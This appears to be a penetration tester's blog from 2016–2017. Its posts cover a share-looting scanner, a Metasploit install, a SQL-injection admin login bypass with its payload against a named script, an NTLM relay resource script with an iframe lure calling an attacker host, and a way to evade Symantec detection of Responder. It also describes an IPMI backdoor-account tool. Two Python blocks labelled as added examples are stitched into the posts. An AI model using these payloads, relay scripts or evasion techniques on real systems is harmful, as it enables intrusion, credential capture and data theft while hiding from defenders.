## Wednesday, July 12, 2017

### Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, and so on, and due to resource restrictions I can't dive any deeper. While these are findings in their own right, it leaves a lot on the bone in my opinion. Finding that these services are also hosting sensitive information could turn a medium finding into a high or critical, depending on the scale you use.

I have seen countless third-party "pen-test vendors" do the same and pass over looking at the data that is being exposed by the service. There are some tools out there with functions that are somewhat similar, but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically you find an anonymous FTP or SMB server, then you just plug in the IP of the host and, in the case of SMB, the share path. BQ will download all the files on the FTP server or mount the SMB share, and then use grep and regex to locate IPs, emails, CC#s, SS#s, phone #s, IBANs, usernames, and passwords. If it finds text files and images it will copy them to another location so you can sift over them later.

Basic setup:
After you download the script run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh
############################
# [B]ooty [Q]uest          #
# By Adam Espitia          #
# aahideaway.blogspot.com  #
# Arr, matey,              #
#  where be me booty!      #
############################

This script will mount/download contact from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/
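To show what the search step looks like once the data is on disk (the "local" mode), here is an added Python example; it is not BQ's own code. It walks a directory, sets binaries aside instead of grepping them, and reports emails, IPv4 addresses, SSNs and card numbers, with a Luhn check so random digit runs are not reported as cards. The sample files in demo() are constructed for the example.

```python
import os, re, tempfile

PATTERNS = {  # a subset of the data classes BQ greps for, written for this example
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def luhn_ok(digits):
    """Luhn checksum, so random 13-16 digit runs are not reported as card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch) * 2 if i % 2 else int(ch)
        total += d - 9 if d > 9 else d
    return total % 10 == 0

def scan_text(text):
    """Return {class: [matches]} for the sensitive data found in one file's text."""
    hits = {}
    for name, rx in PATTERNS.items():
        for m in rx.findall(text):
            if name == "card" and not luhn_ok(re.sub(r"\D", "", m)):
                continue
            hits.setdefault(name, []).append(m)
    return hits

def scan_tree(root):
    """Walk a mounted share (or local dir) and scan every text-like file in it."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                raw = fh.read()
            if b"\x00" in raw:  # binary (images etc.): BQ copies these aside instead
                continue
            if hits := scan_text(raw.decode("utf-8", "replace")):
                report[os.path.relpath(path, root)] = hits
    return report

def demo():
    """Constructed sample share: one text file with hits and one binary file."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("contact bob@example.com at 10.0.0.5, SSN 123-45-6789\n"
                 "card 4111 1111 1111 1111, order no 1234 5678 9012 3456\n")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\x00\x00")
    return scan_tree(root)
```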

## Friday, June 30, 2017

### Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, here's how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O -)
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O -)
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF; done'
nano /opt/metasploit-framework/config/database.yml

database.yml contents:
production:
  adapter: postgresql
  database: msf
  username: msf
  password: blah
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5

More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...

Yeah that sucked, but it works!

## Tuesday, January 3, 2017

### My Click Counter 1.0 admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to the script's admin login page and submit ' or ''=' for the username and password
and it should give you access to the admin area. Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/my_click_counter/login.php
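Why that string works, shown as an added Python example (a minimal stand-in for a login query built by string concatenation, not the vendor's code): the vulnerable check accepts the payload from the advisory because the WHERE clause becomes username='' or ''='' AND password='' or ''='', which is always true, while the same check with bound parameters treats the input as plain data. The admins table and its row are constructed for the example.

```python
import sqlite3

PAYLOAD = "' or ''='"  # the bypass string from the advisory above

def make_db():
    """Constructed sample table standing in for the script's admin users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # password kept in clear only to keep the sample short
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret')")
    return db

def login_vulnerable(db, username, password):
    """Login check built by string concatenation: user input becomes SQL."""
    sql = ("SELECT username FROM admins WHERE username='" + username
           + "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, username, password):
    """Same check with bound parameters: the input is only ever data."""
    sql = "SELECT username FROM admins WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Run the payload and valid credentials against both versions."""
    db = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(db, PAYLOAD, PAYLOAD),
        "fixed_bypass": login_fixed(db, PAYLOAD, PAYLOAD),
        "fixed_valid": login_fixed(db, "admin", "s3cret"),
        "vulnerable_valid": login_vulnerable(db, "admin", "s3cret"),
    }
```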

## Sunday, July 24, 2016

### Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. So I have been trying to automate the downloading of all files on a share using metasploit's http_ntlmrelay module. Here is the scenario: you are on a network with file share servers that host employees' Windows Documents folders and authenticate using NTLM. Active Directory has anonymous read access, which you can use to find the address of the file server and the path the user has access to. Assuming you have only one shot to get the loot, I first use RTYPE SMB_LS, then use a sync file to parse the data and download the first file found using SMB_GET. I used a resource file to tie it all together; here is the code I used below.

resource.rb
use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RHOST
set RPORT 445
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run

syncfile.rb
print_status("looking for data...")
framework.db.notes.each do |note|
  if (note.ntype == 'ntlm_relay')
    for app in note.data[:Response]
      p1 = app[1].to_s.split(",")
      if (p1[0] == '{"type"=>"F"')
        datastore['RURIPATH'] = note.data[:RURI] + app[0]
      end
    end
  end
  puts(datastore['RURIPATH'])
end

payload.html
<iframe src="http://kali:8080/test1"></iframe>
<iframe src="http://kali:8080/test2"></iframe>

The issues I'm having are: this method can only download one file at the moment, and if the share's path goes deeper than one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out; if you have a solution please let me know! Thank you and enjoy.

## Tuesday, May 17, 2016

### Bypassing Symantec Endpoint SMB NTLM capture attack detection

A while back I was running Responder on a network to get some hashes. To my surprise, the incident response team pinged me and asked if alerts they were getting from Symantec Endpoint Security [SEP] were from my activities. I social engineered them a little and they ended up sending me a screen cap. The screen cap they sent me said:
Attack: SMB Sniffer Negotiate Protocol Challenge Key 2
Now when I googled that it returned a page which gives a bit more information.
URL: https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26956

On that page it says:
This signature detects attempts to sniff SMB usernames and passwords through a known challenge key which can then be used to crack the passwords offline.
The key words there are "through a known challenge key". Responder uses the default challenge key of 1122334455667788 and that is how SEP detected this attack. Responder is awesome and has a config file that allows you to change the challenge key to whatever you want, which then bypasses SEP detection of the attack. The config file is found in /usr/share/responder/ on Kali 2 systems; simply change the challenge key to something like 2211334455667788 and your attacks will go unnoticed by SEP. Happy hacking :)

## Saturday, March 12, 2016

### IPMIPWN Tool

There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability, but because it's relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I have found I keep having to brush up on commands and junk every time I come across it, which is where my tool comes in.

My IPMIPWN tool does all the real work for you: it will attempt to exploit the cipher 0 vulnerability using a list of predefined default user accounts and set up a backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali; it does require you to have ipmitool ("apt-get install ipmitool") and NMAP installed. Enjoy.

Get IPMIPWN from GitHub

## Thursday, March 3, 2016

### My Own DROWN Detection Tool

I had to find a quick way to detect the DROWN vulnerability on a large enterprise-level network, so this goes more into the vulnerability management realm, but I was tasked with it nonetheless, and I thought others might get some use from my work here as well.

I didn't like the scanning tool from drownattack.com, and most of the systems in scope were internal so I couldn't use their online version either. First I tried OpenSSL, but the version that comes with Kali 2 does not support SSLv2 even though the help menu says it does. I was going to try and recompile OpenSSL to add SSLv2 support but that was proving to be a pain in the ass.

That's when I made a little bash script that uses NMAP and TestSSLServer to detect SSLv2 support on port 443 of a web server. All you need to do is provide a list of IPs and it goes to work. Unlike all the other tools available at the moment, the output is clear and easy to understand. It does lack features and support for other ports; if the tool proves popular I will be happy to add both. Enjoy and happy hacking :)

Get the DROWN Detection Tool from GitHub.

**UPDATE:** Thanks to ngharo for the code contribution. Already merged your changes into master!